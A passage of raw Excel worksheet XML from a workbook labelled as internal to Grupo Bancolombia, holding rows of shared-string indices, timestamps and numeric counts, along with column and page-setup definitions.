      </c>
      <c r="D186">
        <v>111</v>
      </c>
      <c r="E186" t="s">
        <v>3300</v>
      </c>
      <c r="F186">
        <v>201</v>
      </c>
      <c r="G186" t="s">
        <v>3301</v>
      </c>
      <c r="H186" t="s">
        <v>2299</v>
      </c>
      <c r="I186" t="s">
        <v>203</v>
      </c>
      <c r="J186" t="s">
        <v>204</v>
      </c>
      <c r="K186" t="s">
        <v>24</v>
      </c>
      <c r="L186" t="s">
        <v>83</v>
      </c>
      <c r="M186" t="s">
        <v>72</v>
      </c>
      <c r="P186" t="s">
        <v>1824</v>
      </c>
      <c r="Q186" t="s">
        <v>3661</v>
      </c>
      <c r="R186">
        <v>1</v>
      </c>
      <c r="S186">
        <v>1</v>
      </c>
      <c r="T186">
        <v>2</v>
      </c>
      <c r="U186">
        <v>2</v>
      </c>
      <c r="V186">
        <v>5</v>
      </c>
      <c r="W186" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="187" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A187" t="s">
        <v>3</v>
      </c>
      <c r="B187">
        <v>43847.510102187502</v>
      </c>
      <c r="C187" t="s">
        <v>3175</v>
      </c>
      <c r="D187">
        <v>151</v>
      </c>
      <c r="E187" t="s">
        <v>3302</v>
      </c>
      <c r="F187">
        <v>101</v>
      </c>
      <c r="G187" t="s">
        <v>3303</v>
      </c>
      <c r="H187" t="s">
        <v>2358</v>
      </c>
      <c r="I187" t="s">
        <v>179</v>
      </c>
      <c r="J187" t="s">
        <v>180</v>
      </c>
      <c r="K187" t="s">
        <v>19</v>
      </c>
      <c r="L187" t="s">
        <v>77</v>
      </c>
      <c r="O187" t="s">
        <v>2359</v>
      </c>
      <c r="P187" t="s">
        <v>181</v>
      </c>
      <c r="Q187" t="s">
        <v>3670</v>
      </c>
      <c r="R187">
        <v>298</v>
      </c>
      <c r="S187">
        <v>200</v>
      </c>
      <c r="T187">
        <v>1421</v>
      </c>
      <c r="U187">
        <v>2520</v>
      </c>
      <c r="V187">
        <v>2383</v>
      </c>
      <c r="W187" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="188" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A188" t="s">
        <v>3</v>
      </c>
      <c r="B188">
        <v>43762.390177233799</v>
      </c>
      <c r="C188" t="s">
        <v>3175</v>
      </c>
      <c r="D188">
        <v>151</v>
      </c>
      <c r="E188" t="s">
        <v>3304</v>
      </c>
      <c r="F188">
        <v>100</v>
      </c>
      <c r="G188" t="s">
        <v>3305</v>
      </c>
      <c r="H188" t="s">
        <v>3306</v>
      </c>
      <c r="I188" t="s">
        <v>179</v>
      </c>
      <c r="J188" t="s">
        <v>180</v>
      </c>
      <c r="K188" t="s">
        <v>19</v>
      </c>
      <c r="L188" t="s">
        <v>77</v>
      </c>
      <c r="O188" t="s">
        <v>3307</v>
      </c>
      <c r="P188" t="s">
        <v>920</v>
      </c>
      <c r="Q188" t="s">
        <v>3670</v>
      </c>
      <c r="W188" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="189" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A189" t="s">
        <v>3</v>
      </c>
      <c r="B189">
        <v>44082.361591064815</v>
      </c>
      <c r="C189" t="s">
        <v>2378</v>
      </c>
      <c r="D189">
        <v>100</v>
      </c>
      <c r="E189" t="s">
        <v>3308</v>
      </c>
      <c r="F189">
        <v>100</v>
      </c>
      <c r="G189" t="s">
        <v>3309</v>
      </c>
      <c r="H189" t="s">
        <v>3310</v>
      </c>
      <c r="I189" t="s">
        <v>31</v>
      </c>
      <c r="J189" t="s">
        <v>262</v>
      </c>
      <c r="K189" t="s">
        <v>31</v>
      </c>
      <c r="L189" t="s">
        <v>77</v>
      </c>
      <c r="M189" t="s">
        <v>262</v>
      </c>
      <c r="N189" t="s">
        <v>263</v>
      </c>
      <c r="Q189" t="s">
        <v>3655</v>
      </c>
      <c r="W189" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="190" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A190" t="s">
        <v>3</v>
      </c>
      <c r="B190">
        <v>44082.36159104167</v>
      </c>
      <c r="C190" t="s">
        <v>2378</v>
      </c>
      <c r="D190">
        <v>100</v>
      </c>
      <c r="E190" t="s">
        <v>3311</v>
      </c>
      <c r="F190">
        <v>100</v>
      </c>
      <c r="G190" t="s">
        <v>3312</v>
      </c>
      <c r="H190" t="s">
        <v>2377</v>
      </c>
      <c r="I190" t="s">
        <v>31</v>
      </c>
      <c r="J190" t="s">
        <v>262</v>
      </c>
      <c r="K190" t="s">
        <v>31</v>
      </c>
      <c r="L190" t="s">
        <v>77</v>
      </c>
      <c r="M190" t="s">
        <v>262</v>
      </c>
      <c r="N190" t="s">
        <v>263</v>
      </c>
      <c r="Q190" t="s">
        <v>3655</v>
      </c>
      <c r="W190" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="191" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A191" t="s">
        <v>3</v>
      </c>
      <c r="B191">
        <v>43942.496504606483</v>
      </c>
      <c r="C191" t="s">
        <v>3313</v>
      </c>
      <c r="D191">
        <v>101</v>
      </c>
      <c r="E191" t="s">
        <v>3314</v>
      </c>
      <c r="F191">
        <v>101</v>
      </c>
      <c r="G191" t="s">
        <v>3315</v>
      </c>
      <c r="H191" t="s">
        <v>3316</v>
      </c>
      <c r="I191" t="s">
        <v>179</v>
      </c>
      <c r="J191" t="s">
        <v>1006</v>
      </c>
      <c r="K191" t="s">
        <v>23</v>
      </c>
      <c r="L191" t="s">
        <v>77</v>
      </c>
      <c r="M191" t="s">
        <v>1006</v>
      </c>
      <c r="N191" t="s">
        <v>1007</v>
      </c>
      <c r="O191" t="s">
        <v>3317</v>
      </c>
      <c r="Q191" t="s">
        <v>151</v>
      </c>
      <c r="R191">
        <v>11</v>
      </c>
      <c r="S191">
        <v>3</v>
      </c>
      <c r="T191">
        <v>39</v>
      </c>
      <c r="U191">
        <v>641</v>
      </c>
      <c r="V191">
        <v>2819</v>
      </c>
      <c r="W191" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="192" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A192" t="s">
        <v>3</v>
      </c>
      <c r="B192">
        <v>44021.851558125003</v>
      </c>
      <c r="C192" t="s">
        <v>3318</v>
      </c>
      <c r="D192">
        <v>101</v>
      </c>
      <c r="E192" t="s">
        <v>3319</v>
      </c>
      <c r="F192">
        <v>101</v>
      </c>
      <c r="G192" t="s">
        <v>3320</v>
      </c>
      <c r="H192" t="s">
        <v>2592</v>
      </c>
      <c r="I192" t="s">
        <v>185</v>
      </c>
      <c r="J192" t="s">
        <v>186</v>
      </c>
      <c r="K192" t="s">
        <v>16</v>
      </c>
      <c r="L192" t="s">
        <v>83</v>
      </c>
      <c r="M192" t="s">
        <v>72</v>
      </c>
      <c r="O192" t="s">
        <v>2593</v>
      </c>
      <c r="P192" t="s">
        <v>677</v>
      </c>
      <c r="Q192" t="s">
        <v>3679</v>
      </c>
      <c r="R192">
        <v>8234</v>
      </c>
      <c r="S192">
        <v>6256</v>
      </c>
      <c r="T192">
        <v>49340</v>
      </c>
      <c r="U192">
        <v>73062</v>
      </c>
      <c r="V192">
        <v>85331</v>
      </c>
      <c r="W192" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="193" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A193" t="s">
        <v>3</v>
      </c>
      <c r="B193">
        <v>43748.941609791669</v>
      </c>
      <c r="C193" t="s">
        <v>3199</v>
      </c>
      <c r="D193">
        <v>173</v>
      </c>
      <c r="E193" t="s">
        <v>3322</v>
      </c>
      <c r="F193">
        <v>130</v>
      </c>
      <c r="G193" t="s">
        <v>3323</v>
      </c>
      <c r="H193" t="s">
        <v>3324</v>
      </c>
      <c r="I193" t="s">
        <v>268</v>
      </c>
      <c r="J193" t="s">
        <v>269</v>
      </c>
      <c r="K193" t="s">
        <v>21</v>
      </c>
      <c r="L193" t="s">
        <v>77</v>
      </c>
      <c r="N193" t="s">
        <v>3208</v>
      </c>
      <c r="Q193" t="s">
        <v>3672</v>
      </c>
      <c r="W193" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="194" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A194" t="s">
        <v>3</v>
      </c>
      <c r="B194">
        <v>44140.032963622682</v>
      </c>
      <c r="C194" t="s">
        <v>3199</v>
      </c>
      <c r="D194">
        <v>206</v>
      </c>
      <c r="E194" t="s">
        <v>3322</v>
      </c>
      <c r="F194">
        <v>132</v>
      </c>
      <c r="G194" t="s">
        <v>3323</v>
      </c>
      <c r="H194" t="s">
        <v>3324</v>
      </c>
      <c r="I194" t="s">
        <v>268</v>
      </c>
      <c r="J194" t="s">
        <v>269</v>
      </c>
      <c r="K194" t="s">
        <v>21</v>
      </c>
      <c r="L194" t="s">
        <v>77</v>
      </c>
      <c r="N194" t="s">
        <v>3208</v>
      </c>
      <c r="O194" t="s">
        <v>3325</v>
      </c>
      <c r="Q194" t="s">
        <v>3673</v>
      </c>
      <c r="R194">
        <v>23103</v>
      </c>
      <c r="S194">
        <v>12603</v>
      </c>
      <c r="T194">
        <v>80018</v>
      </c>
      <c r="U194">
        <v>151727</v>
      </c>
      <c r="V194">
        <v>174106</v>
      </c>
      <c r="W194" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="195" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A195" t="s">
        <v>3</v>
      </c>
      <c r="B195">
        <v>43748.941609780093</v>
      </c>
      <c r="C195" t="s">
        <v>3199</v>
      </c>
      <c r="D195">
        <v>173</v>
      </c>
      <c r="E195" t="s">
        <v>3326</v>
      </c>
      <c r="F195">
        <v>120</v>
      </c>
      <c r="G195" t="s">
        <v>3327</v>
      </c>
      <c r="H195" t="s">
        <v>1074</v>
      </c>
      <c r="I195" t="s">
        <v>268</v>
      </c>
      <c r="J195" t="s">
        <v>269</v>
      </c>
      <c r="K195" t="s">
        <v>21</v>
      </c>
      <c r="L195" t="s">
        <v>77</v>
      </c>
      <c r="N195" t="s">
        <v>3208</v>
      </c>
      <c r="Q195" t="s">
        <v>3672</v>
      </c>
      <c r="W195" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="196" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A196" t="s">
        <v>3</v>
      </c>
      <c r="B196">
        <v>43748.941609780093</v>
      </c>
      <c r="C196" t="s">
        <v>3199</v>
      </c>
      <c r="D196">
        <v>206</v>
      </c>
      <c r="E196" t="s">
        <v>3326</v>
      </c>
      <c r="F196">
        <v>120</v>
      </c>
      <c r="G196" t="s">
        <v>3327</v>
      </c>
      <c r="H196" t="s">
        <v>3328</v>
      </c>
      <c r="I196" t="s">
        <v>268</v>
      </c>
      <c r="J196" t="s">
        <v>269</v>
      </c>
      <c r="K196" t="s">
        <v>21</v>
      </c>
      <c r="L196" t="s">
        <v>77</v>
      </c>
      <c r="N196" t="s">
        <v>3208</v>
      </c>
      <c r="O196" t="s">
        <v>2973</v>
      </c>
      <c r="Q196" t="s">
        <v>3673</v>
      </c>
      <c r="W196" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="197" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A197" t="s">
        <v>3</v>
      </c>
      <c r="B197">
        <v>43872.595933576391</v>
      </c>
      <c r="C197" t="s">
        <v>3199</v>
      </c>
      <c r="D197">
        <v>173</v>
      </c>
      <c r="E197" t="s">
        <v>3329</v>
      </c>
      <c r="F197">
        <v>143</v>
      </c>
      <c r="G197" t="s">
        <v>3330</v>
      </c>
      <c r="H197" t="s">
        <v>3045</v>
      </c>
      <c r="I197" t="s">
        <v>268</v>
      </c>
      <c r="J197" t="s">
        <v>269</v>
      </c>
      <c r="K197" t="s">
        <v>10</v>
      </c>
      <c r="L197" t="s">
        <v>77</v>
      </c>
      <c r="M197" t="s">
        <v>290</v>
      </c>
      <c r="N197" t="s">
        <v>291</v>
      </c>
      <c r="Q197" t="s">
        <v>3672</v>
      </c>
      <c r="R197">
        <v>6</v>
      </c>
      <c r="S197">
        <v>9</v>
      </c>
      <c r="T197">
        <v>64</v>
      </c>
      <c r="U197">
        <v>710</v>
      </c>
      <c r="V197">
        <v>383</v>
      </c>
      <c r="W197" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="198" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A198" t="s">
        <v>3</v>
      </c>
      <c r="B198">
        <v>44109.56779202546</v>
      </c>
      <c r="C198" t="s">
        <v>3199</v>
      </c>
      <c r="D198">
        <v>206</v>
      </c>
      <c r="E198" t="s">
        <v>3329</v>
      </c>
      <c r="F198">
        <v>204</v>
      </c>
      <c r="G198" t="s">
        <v>3330</v>
      </c>
      <c r="H198" t="s">
        <v>3045</v>
      </c>
      <c r="I198" t="s">
        <v>268</v>
      </c>
      <c r="J198" t="s">
        <v>269</v>
      </c>
      <c r="K198" t="s">
        <v>10</v>
      </c>
      <c r="L198" t="s">
        <v>77</v>
      </c>
      <c r="M198" t="s">
        <v>290</v>
      </c>
      <c r="N198" t="s">
        <v>291</v>
      </c>
      <c r="P198" t="s">
        <v>250</v>
      </c>
      <c r="Q198" t="s">
        <v>3673</v>
      </c>
      <c r="R198">
        <v>1075</v>
      </c>
      <c r="S198">
        <v>668</v>
      </c>
      <c r="T198">
        <v>8073</v>
      </c>
      <c r="U198">
        <v>563366</v>
      </c>
      <c r="V198">
        <v>320165</v>
      </c>
      <c r="W198" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="199" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A199" t="s">
        <v>3</v>
      </c>
      <c r="B199">
        <v>43838.913499305556</v>
      </c>
      <c r="C199" t="s">
        <v>3199</v>
      </c>
      <c r="D199">
        <v>173</v>
      </c>
      <c r="E199" t="s">
        <v>3331</v>
      </c>
      <c r="F199">
        <v>101</v>
      </c>
      <c r="G199" t="s">
        <v>3332</v>
      </c>
      <c r="H199" t="s">
        <v>1074</v>
      </c>
      <c r="I199" t="s">
        <v>268</v>
      </c>
      <c r="J199" t="s">
        <v>269</v>
      </c>
      <c r="K199" t="s">
        <v>10</v>
      </c>
      <c r="L199" t="s">
        <v>77</v>
      </c>
      <c r="M199" t="s">
        <v>290</v>
      </c>
      <c r="N199" t="s">
        <v>291</v>
      </c>
      <c r="O199" t="s">
        <v>2973</v>
      </c>
      <c r="Q199" t="s">
        <v>3672</v>
      </c>
      <c r="R199">
        <v>9327</v>
      </c>
      <c r="S199">
        <v>1034</v>
      </c>
      <c r="T199">
        <v>677</v>
      </c>
      <c r="U199">
        <v>1463</v>
      </c>
      <c r="V199">
        <v>3350</v>
      </c>
      <c r="W199" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="200" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A200" t="s">
        <v>3</v>
      </c>
      <c r="B200">
        <v>44109.567792048612</v>
      </c>
      <c r="C200" t="s">
        <v>3199</v>
      </c>
      <c r="D200">
        <v>206</v>
      </c>
      <c r="E200" t="s">
        <v>3331</v>
      </c>
      <c r="F200">
        <v>104</v>
      </c>
      <c r="G200" t="s">
        <v>3332</v>
      </c>
      <c r="H200" t="s">
        <v>3333</v>
      </c>
      <c r="I200" t="s">
        <v>268</v>
      </c>
      <c r="J200" t="s">
        <v>269</v>
      </c>
      <c r="K200" t="s">
        <v>10</v>
      </c>
      <c r="L200" t="s">
        <v>77</v>
      </c>
      <c r="M200" t="s">
        <v>290</v>
      </c>
      <c r="N200" t="s">
        <v>291</v>
      </c>
      <c r="O200" t="s">
        <v>2973</v>
      </c>
      <c r="P200" t="s">
        <v>250</v>
      </c>
      <c r="Q200" t="s">
        <v>3673</v>
      </c>
      <c r="R200">
        <v>12</v>
      </c>
      <c r="S200">
        <v>18</v>
      </c>
      <c r="T200">
        <v>38</v>
      </c>
      <c r="W200" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="201" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A201" t="s">
        <v>3</v>
      </c>
      <c r="B201">
        <v>43908.846880520832</v>
      </c>
      <c r="C201" t="s">
        <v>3334</v>
      </c>
      <c r="D201">
        <v>120</v>
      </c>
      <c r="E201" t="s">
        <v>3335</v>
      </c>
      <c r="F201">
        <v>101</v>
      </c>
      <c r="G201" t="s">
        <v>3336</v>
      </c>
      <c r="H201" t="s">
        <v>3337</v>
      </c>
      <c r="I201" t="s">
        <v>103</v>
      </c>
      <c r="J201" t="s">
        <v>104</v>
      </c>
      <c r="K201" t="s">
        <v>19</v>
      </c>
      <c r="L201" t="s">
        <v>77</v>
      </c>
      <c r="M201" t="s">
        <v>104</v>
      </c>
      <c r="P201" t="s">
        <v>2748</v>
      </c>
      <c r="Q201" t="s">
        <v>3680</v>
      </c>
      <c r="R201">
        <v>73</v>
      </c>
      <c r="S201">
        <v>50</v>
      </c>
      <c r="T201">
        <v>1231</v>
      </c>
      <c r="U201">
        <v>2055</v>
      </c>
      <c r="V201">
        <v>2867</v>
      </c>
      <c r="W201" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="202" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A202" t="s">
        <v>3</v>
      </c>
      <c r="B202">
        <v>44019.153889895832</v>
      </c>
      <c r="C202" t="s">
        <v>3339</v>
      </c>
      <c r="D202">
        <v>202</v>
      </c>
      <c r="E202" t="s">
        <v>3340</v>
      </c>
      <c r="F202">
        <v>202</v>
      </c>
      <c r="G202" t="s">
        <v>3341</v>
      </c>
      <c r="H202" t="s">
        <v>2968</v>
      </c>
      <c r="I202" t="s">
        <v>268</v>
      </c>
      <c r="J202" t="s">
        <v>269</v>
      </c>
      <c r="K202" t="s">
        <v>10</v>
      </c>
      <c r="L202" t="s">
        <v>77</v>
      </c>
      <c r="M202" t="s">
        <v>290</v>
      </c>
      <c r="N202" t="s">
        <v>291</v>
      </c>
      <c r="O202" t="s">
        <v>2969</v>
      </c>
      <c r="P202" t="s">
        <v>250</v>
      </c>
      <c r="Q202" t="s">
        <v>3681</v>
      </c>
      <c r="R202">
        <v>211143</v>
      </c>
      <c r="S202">
        <v>146619</v>
      </c>
      <c r="T202">
        <v>959799</v>
      </c>
      <c r="U202">
        <v>1784964</v>
      </c>
      <c r="V202">
        <v>1886227</v>
      </c>
      <c r="W202" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="203" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A203" t="s">
        <v>3</v>
      </c>
      <c r="B203">
        <v>43811.90038146991</v>
      </c>
      <c r="C203" t="s">
        <v>3343</v>
      </c>
      <c r="D203">
        <v>100</v>
      </c>
      <c r="E203" t="s">
        <v>3344</v>
      </c>
      <c r="F203">
        <v>100</v>
      </c>
      <c r="G203" t="s">
        <v>3345</v>
      </c>
      <c r="H203" t="s">
        <v>3346</v>
      </c>
      <c r="I203" t="s">
        <v>185</v>
      </c>
      <c r="J203" t="s">
        <v>186</v>
      </c>
      <c r="K203" t="s">
        <v>16</v>
      </c>
      <c r="L203" t="s">
        <v>83</v>
      </c>
      <c r="M203" t="s">
        <v>72</v>
      </c>
      <c r="O203" t="s">
        <v>2601</v>
      </c>
      <c r="Q203" t="s">
        <v>3682</v>
      </c>
      <c r="R203">
        <v>26</v>
      </c>
      <c r="S203">
        <v>21</v>
      </c>
      <c r="T203">
        <v>137</v>
      </c>
      <c r="U203">
        <v>209</v>
      </c>
      <c r="V203">
        <v>201</v>
      </c>
      <c r="W203" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="204" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A204" t="s">
        <v>3</v>
      </c>
      <c r="B204">
        <v>44047.508589282406</v>
      </c>
      <c r="C204" t="s">
        <v>3343</v>
      </c>
      <c r="D204">
        <v>210</v>
      </c>
      <c r="E204" t="s">
        <v>3344</v>
      </c>
      <c r="F204">
        <v>210</v>
      </c>
      <c r="G204" t="s">
        <v>3345</v>
      </c>
      <c r="H204" t="s">
        <v>3346</v>
      </c>
      <c r="I204" t="s">
        <v>185</v>
      </c>
      <c r="J204" t="s">
        <v>186</v>
      </c>
      <c r="K204" t="s">
        <v>16</v>
      </c>
      <c r="L204" t="s">
        <v>83</v>
      </c>
      <c r="M204" t="s">
        <v>72</v>
      </c>
      <c r="O204" t="s">
        <v>2601</v>
      </c>
      <c r="P204" t="s">
        <v>1795</v>
      </c>
      <c r="Q204" t="s">
        <v>3107</v>
      </c>
      <c r="R204">
        <v>22100</v>
      </c>
      <c r="S204">
        <v>16165</v>
      </c>
      <c r="T204">
        <v>103856</v>
      </c>
      <c r="U204">
        <v>156387</v>
      </c>
      <c r="V204">
        <v>181976</v>
      </c>
      <c r="W204" t="s">
        <v>208</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="10" type="noConversion"/>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawingHF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D3092-B22E-4C60-A756-8BE6F776A25A}">
  <sheetPr codeName="Hoja5"/>
  <dimension ref="A1:W102"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="8" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="8.453125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="19.08984375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="18.6328125" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="55.453125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="6.6328125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="21.36328125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="22" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="26.90625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="25.54296875" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="20.36328125" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="24.54296875" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="28.54296875" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="22.90625" bestFit="1" customWidth="1"/>
    <col min="16" max="17" width="81.08984375" customWidth="1"/>
    <col min="18" max="18" width="8.90625" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="7.54296875" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="8.36328125" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="8" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="7.453125" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="13.90625" customWidth="1"/>
    <col min="24" max="24" width="19.90625" bestFit="1" customWidth="1"/>
    <col min="25" max="25" width="19.54296875" bestFit="1" customWidth="1"/>
    <col min="26" max="27" width="13.90625" customWidth="1"/>
    <col min="28" max="29" width="13.90625" bestFit="1" customWidth="1"/>
    <col min="30" max="30" width="13.90625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" t="s">
        <v>1</v>
      </c>
      <c r="B1" t="s">
        <v>51</v>
      </c>
      <c r="C1" t="s">
        <v>52</v>
      </c>
      <c r="D1" t="s">
        <v>53</v>
      </c>
      <c r="E1" t="s">
        <v>54</v>
      </c>
      <c r="F1" t="s">
        <v>55</v>
      </c>
      <c r="G1" t="s">
        <v>56</v>
      </c>
      <c r="H1" t="s">
        <v>57</v>
      </c>
      <c r="I1" t="s">
        <v>58</v>
      </c>
      <c r="J1" t="s">
        <v>59</v>
      </c>
      <c r="K1" t="s">
        <v>8</v>
      </c>
      <c r="L1" t="s">
        <v>60</v>
      </c>
      <c r="M1" t="s">
        <v>61</v>
      </c>
      <c r="N1" t="s">
        <v>62</v>
      </c>
      <c r="O1" t="s">
        <v>63</v>
      </c>
      <c r="P1" t="s">
        <v>64</v>
      </c>
      <c r="Q1" t="s">
        <v>65</v>
      </c>
      <c r="R1" t="s">
        <v>66</v>
      </c>
      <c r="S1" t="s">
        <v>67</v>
      </c>
      <c r="T1" t="s">
        <v>68</v>
      </c>
      <c r="U1" t="s">
        <v>69</v>
      </c>
      <c r="V1" t="s">
        <v>70</v>
      </c>
      <c r="W1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" t="s">
        <v>5</v>
      </c>
      <c r="E2" t="s">
        <v>2444</v>
      </c>
      <c r="H2" t="s">
        <v>2441</v>
      </c>
      <c r="I2" t="s">
        <v>31</v>
      </c>
      <c r="J2" t="s">
        <v>262</v>
      </c>
      <c r="P2" t="s">
        <v>2445</v>
      </c>
      <c r="Q2" t="s">
        <v>3632</v>
      </c>
      <c r="W2" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>5</v>
      </c>
      <c r="E3" t="s">
        <v>2526</v>
      </c>
      <c r="H3" t="s">
        <v>2441</v>
      </c>
      <c r="I3" t="s">
        <v>210</v>
      </c>
      <c r="J3" t="s">
        <v>269</v>
      </c>
      <c r="K3" t="s">
        <v>10</v>
      </c>
      <c r="L3" t="s">
        <v>77</v>
      </c>
      <c r="M3" t="s">
        <v>1766</v>
      </c>
      <c r="N3" t="s">
        <v>1766</v>
      </c>
      <c r="Q3" t="s">
        <v>161</v>
      </c>
      <c r="W3" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>5</v>
      </c>
      <c r="E4" t="s">
        <v>2454</v>
      </c>
      <c r="H4" t="s">
        <v>2441</v>
      </c>
      <c r="I4" t="s">
        <v>268</v>
      </c>
      <c r="J4" t="s">
        <v>269</v>
      </c>
      <c r="P4" t="s">
        <v>250</v>
      </c>
      <c r="Q4" t="s">
        <v>2455</v>
      </c>
      <c r="W4" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>5</v>
      </c>
      <c r="E5" t="s">
        <v>2817</v>
      </c>
      <c r="H5" t="s">
        <v>2441</v>
      </c>
      <c r="I5" t="s">
        <v>268</v>
      </c>
      <c r="J5" t="s">
        <v>269</v>
      </c>
      <c r="P5" t="s">
        <v>250</v>
      </c>
      <c r="Q5" t="s">
        <v>2455</v>
      </c>
      <c r="W5" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>5</v>
      </c>
      <c r="E6" t="s">
        <v>2456</v>
      </c>
      <c r="H6" t="s">
        <v>2441</v>
      </c>
      <c r="I6" t="s">
        <v>179</v>
      </c>
      <c r="J6" t="s">
        <v>180</v>
      </c>
      <c r="P6" t="s">
        <v>2457</v>
      </c>
      <c r="Q6" t="s">
        <v>161</v>
      </c>
      <c r="W6" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>5</v>
      </c>
      <c r="E7" t="s">
        <v>2488</v>
      </c>
      <c r="H7" t="s">
        <v>2441</v>
      </c>
      <c r="I7" t="s">
        <v>268</v>
      </c>
      <c r="J7" t="s">
        <v>269</v>
      </c>
      <c r="P7" t="s">
        <v>250</v>
      </c>
      <c r="Q7" t="s">
        <v>2489</v>
      </c>
      <c r="W7" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>5</v>
      </c>
      <c r="E8" t="s">
        <v>2492</v>
      </c>
      <c r="H8" t="s">
        <v>2441</v>
      </c>
      <c r="I8" t="s">
        <v>75</v>
      </c>
      <c r="J8" t="s">
        <v>236</v>
      </c>
      <c r="K8" t="s">
        <v>21</v>
      </c>
      <c r="L8" t="s">
        <v>77</v>
      </c>
      <c r="M8" t="s">
        <v>237</v>
      </c>
      <c r="N8" t="s">
        <v>238</v>
      </c>
      <c r="P8" t="s">
        <v>255</v>
      </c>
      <c r="Q8" t="s">
        <v>161</v>
      </c>
      <c r="W8" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>5</v>
      </c>
      <c r="E9" t="s">
        <v>2495</v>
      </c>
      <c r="H9" t="s">
        <v>2441</v>
      </c>
      <c r="I9" t="s">
        <v>156</v>
      </c>
      <c r="J9" t="s">
        <v>301</v>
      </c>
      <c r="K9" t="s">
        <v>26</v>
      </c>
      <c r="L9" t="s">
        <v>77</v>
      </c>
      <c r="M9" t="s">
        <v>475</v>
      </c>
      <c r="N9" t="s">
        <v>476</v>
      </c>
      <c r="P9" t="s">
        <v>2496</v>
      </c>
      <c r="Q9" t="s">
        <v>2497</v>
      </c>
      <c r="W9" t="s">
        <v>2443</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>5</v>
      </c>
      <c r="E10" t="s">
        <v>2458</v>
      </c>
      <c r="H10" t="s">
        <v>2441</v>
      </c>
      <c r="I10" t="s">
        <v>75</v>
      </c>
      <c r="J10" t="s">
        <v>236</v>
      </c>
      <c r="K10" t="s">
        <v>22</v>
      </c>
      <c r="L10" t="s">
